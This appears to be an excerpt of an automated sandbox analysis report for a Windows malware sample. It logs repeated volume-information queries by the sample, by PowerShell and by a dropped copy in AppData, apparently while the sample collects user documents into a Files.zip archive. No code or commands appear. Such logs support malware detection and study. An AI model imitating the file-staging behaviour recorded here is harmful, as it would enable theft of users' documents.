Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BJZFPPWAPT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BJZFPPWAPT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\CZQKSDDMWR.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\CZQKSDDMWR.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EOWRVPQCCS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EWZCVGNOWT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EWZCVGNOWT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GIGIYTFFYT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GLTYDMDUST.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GNLQNHOLWB.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GNLQNHOLWB.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\HVLFEFMHHB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BJZFPPWAPT.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BJZFPPWAPT.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\CZQKSDDMWR.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\CZQKSDDMWR.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\DWTHNHNNJB.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EOWRVPQCCS.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EOWRVPQCCS.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EWZCVGNOWT.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EWZCVGNOWT.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GIGIYTFFYT.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GIGIYTFFYT.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GLTYDMDUST.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GNLQNHOLWB.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GNLQNHOLWB.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\HVLFEFMHHB.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\HVLFEFMHHB.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QFAPOWPAFG.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QFAPOWPAFG.pdf VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SNIPGPPREP.docx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SNIPGPPREP.docx VolumeInformation
